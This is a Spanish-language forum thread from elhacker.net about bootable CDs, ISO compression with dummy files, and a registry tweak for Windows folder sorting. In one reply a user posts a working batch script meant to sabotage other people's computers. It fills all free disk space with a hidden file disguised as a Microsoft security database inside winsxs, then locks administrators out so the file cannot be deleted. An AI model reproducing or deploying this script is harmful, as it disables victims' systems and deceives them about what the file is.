elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Sistemas Operativos
| |-+  Windows (Moderador: Randomize)
| | |-+  ayuda con booteables
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con booteables  (Leído 3,044 veces)
Charlieone

Desconectado Desconectado

Mensajes: 29



Ver Perfil
ayuda con booteables
« en: 14 Noviembre 2011, 17:45 pm »

hola muy buenas ^^
aver mi duda es:
Se pueden poner 2 ISO's para hacer un cd booteable?
Es que no se si al poner 2 ISO's se me valla al menu del primer booteable que coja o me da la posibilidad de elegir en cual ISO meterme
gracias   :D


En línea

Charlieone

Desconectado Desconectado

Mensajes: 29



Ver Perfil
Re: ayuda con booteables
« Respuesta #1 en: 14 Noviembre 2011, 18:45 pm »

pues.. no ya lo he hecho y... conclusion...
CD en la basura  ;D


En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.700



Ver Perfil
Re: ayuda con booteables
« Respuesta #2 en: 14 Noviembre 2011, 19:52 pm »

Una iso no es más que una imagen "comprimida"....

Piensa en los archivos .ISO como si fuesen .RAR, sin un programa que descomprima los .RAR no puedes hacer nada verdad??? pues con las .ISO lo mismo, si no usas un Loader para cargar la iso al bootear el PC no puedes hacer nada...ni te va a salir ningún menú, ni nada. Lo que intentas hacer se puede, pero todo lleva su aprendizaje, así que no esperes hacerlo bien a la primera si no buscas un tutorial en el foro...

Y para que no gastes más cd's... Puedes probar el resultado final (la ISO final) en una maquina virtual, como VirtualBox por ejemplo...

Con este hice un par de booteables hace un tiempo, EasyBoot > http://www.ezbsystems.com/dl1.php?file=ezb6_en.exe

Saludos.
En línea


Randomize
Moderador
***
Desconectado Desconectado

Mensajes: 20.486


Beautiful Day


Ver Perfil
Re: ayuda con booteables
« Respuesta #3 en: 24 Noviembre 2011, 14:35 pm »

El Office 2003 lo saqué de un CD en el que habían comprimido "de manera excepcional" los 5 CDs de los que se compone.
En línea

oskoa

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: ayuda con booteables
« Respuesta #4 en: 25 Noviembre 2011, 17:49 pm »

Elektro hacker, hablando del tema

Yo tenia un juego de PS2, que ocupaba 360 mb (Zipeado) Pero la Iso son (al descroprimirlo) 3.7 GB O.ocsd,cdfmsdnmdf  :-( :-( :-(

Sabes como se puede hacer eso? Semejante épica compresion?
En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.700



Ver Perfil
Re: ayuda con booteables
« Respuesta #5 en: 26 Noviembre 2011, 03:22 am »

Elektro hacker, hablando del tema

Yo tenia un juego de PS2, que ocupaba 360 mb (Zipeado) Pero la Iso son (al descroprimirlo) 3.7 GB O.ocsd,cdfmsdnmdf  :-( :-( :-(

Sabes como se puede hacer eso? Semejante épica compresion?

Si, por suerte lo sé :xD

Pero eso no es ningún milagro ni es nada extraño

Esas isos antiguas de PS2 llevan un archivo "dummy" (Un archivo que solamente es espacio vacío) es por algo relacionado con los sectores que debe leer la ps2 al meter un disco o algo así, y en los juegos antiguos el dummy pues puede pesar 3 gb o asi y se puede comprimir a 0KB al ser espacio vacío, pero en los juegos más nuevos no te va a servir de nada, porque hay más datos de videos y gráficos pesados, así que el dummy es pequeño 200 o 300 mb no se depende del juego que sea... y en fin, por eso se puede comprimir tantisimo, lo que comprimes es el archivo de espacio vacío, yo lo he echo mil veces, Y le puedes sacar un poco más de MB que el Winrar si usas el emulador PCSX2 (Con el plugin Linuz ISO CDVD) para la compresión de la ISO (a formato BZ2).

Saludos...

EDITO: aprovecho ara contestarte aqui al tema que bloquearon...

EleKtro H@cker, Ahora que lo pienso logiacmente, agerarle algo al final del archivo, sería una solucion. pero es una solucion en base al problema. Yo queria una solucion para el problema (desactivar ese puto ordenado automatico).

A ver si con esto dejas de culpar a Windows...  :P

para desactivar el autorenombrado en Win7 solo tienes que añadir estas claves...

Código
  1. Windows Registry Editor Version 5.00
  2.  
  3. ; Disable Auto Arrange for General Items folder template
  4. [HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}]
  5. "FFLAGS"=dword:43000001
  6. "Mode"=dword:00000004
  7.  
  8.  
  9. ; Disable Auto Arrange for Documents folder template
  10. [HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}]
  11. "FFLAGS"=dword:43000001
  12. "Mode"=dword:00000004
  13.  
  14.  
  15. ; Disable Auto Arrange for Music folder template
  16. [HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\{94D6DDCC-4A68-4175-A374-BD584A510B78}]
  17. "FFLAGS"=dword:43000001
  18. "Mode"=dword:00000004
  19.  
  20.  
  21. ; Disable Auto Arrange for Pictures folder template
  22. [HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\{B3690E58-E961-423B-B687-386EBFD83239}]
  23. "FFLAGS"=dword:43000001
  24. "Mode"=dword:00000004
  25.  
  26.  
  27. ; Disable Auto Arrange for Videos folder template
  28. [HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}]
  29. "FFLAGS"=dword:43000001
  30. "Mode"=dword:00000004


FUENTE: http://www.sevenforums.com/tutorials/92758-windows-explorer-auto-arrange-disable.html
« Última modificación: 26 Noviembre 2011, 03:38 am por EleKtro H@cker » En línea


Randomize
Moderador
***
Desconectado Desconectado

Mensajes: 20.486


Beautiful Day


Ver Perfil
Re: ayuda con booteables
« Respuesta #6 en: 26 Noviembre 2011, 07:15 am »

Existe una leyenda por la red y es la de comprimir archivos muy grandes a un tamaño que podría caber en un disquete.

Hay que pensar un poco, puede ocurrir lo que dice electro, y los archivos multimedia pueden ser comprimidos una barbaridad, pero recuerda que todo tiene "su peso".
En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.700



Ver Perfil
Re: ayuda con booteables
« Respuesta #7 en: 26 Noviembre 2011, 08:38 am »

Existe una leyenda por la red y es la de comprimir archivos muy grandes a un tamaño que podría caber en un disquete.

Si jaja, yo recuerdo un post en Taringa o en Vagos donde un usuario compartía una iso de windows, en solo 5 MB, decía que estaba supercomprimida y blablabla jaja, luego la gente se quedaba flipando porque al descomprimir el rar ocupada 4 gb el archivo .iso (Era un archivo dummy) y se lo acababan creyendo, pero al grabarla, obviamente a nadie le funcionaba.

Que bromistas xD.

De echo es muy fácil crear un archivo dummy desde la CMD:

Código
  1. fsutil file createnew C:\Windows7.ISO 1000000000

PD: Ocupa 1 GB, cuando lo comprimo con Winrar no pesa ni 300 bytes xD


EDITO: Acabo de hacer este pequeño batch para "putear" el espacio libre de pc ajeno xD con fines educativos  :P:

Código
  1. @echo off
  2. Setlocal enabledelayedexpansion
  3. Title I Hate Your Free HDD Space
  4.  
  5.  
  6. :By EleKtrO H@ckeR
  7. :#################
  8.  
  9.  
  10. :Permisos
  11. :~~~~~~~~
  12. Takeown /F "%Windir%\winsxs" >NUL 2>&1
  13. Icacls     "%Windir%\winsxs" /Grant Administradores:(D,WDAC)  >NUL 2>&1
  14.  
  15.  
  16. :Dummy
  17. :~~~~~
  18. For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
  19. Set Size=%%f
  20. Set Size=!Size:~-0,-6!
  21. Set Size=!Size!000000
  22. Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
  23. )
  24.  
  25.  
  26. :AntiDelete
  27. :~~~~~~~~~~
  28. Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
  29. Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant Administradores:F >NUL 2>&1
  30. Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
  31. Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny Administradores:F >NUL 2>&1
  32.  
  33.  
  34. :FIN
  35. :~~~
  36.  
« Última modificación: 26 Noviembre 2011, 11:31 am por EleKtro H@cker » En línea


Randomize
Moderador
***
Desconectado Desconectado

Mensajes: 20.486


Beautiful Day


Ver Perfil
Re: ayuda con booteables
« Respuesta #8 en: 26 Noviembre 2011, 10:58 am »

http://foro.elhacker.net no se responsabiliza de los "puteos" a PCs ajenos  :-\
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como hacer CD's Booteables
Software
__LoG26 3 1,743 Último mensaje 11 Marzo 2005, 03:30 am
por Gatuzo
crear un cd o dvd con varios windwos booteables y elegir con cual arrancar « 1 2 ... 5 6 »
Dudas Generales
Luish@o 57 27,124 Último mensaje 15 Agosto 2010, 20:11 pm
por yendyjm
Programas booteables en C
Programación C/C++
lucaslopez0000 3 1,160 Último mensaje 25 Diciembre 2012, 22:33 pm
por 0xDani
DUDA : C , programas booteables y memtest86
Programación C/C++
lucaslopez0000 5 1,591 Último mensaje 27 Diciembre 2012, 16:15 pm
por flony
Necesito ayuda sobre CD USB Booteables « 1 2 3 »
Hardware
katwenty 27 6,277 Último mensaje 22 Septiembre 2015, 15:29 pm
por knario
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines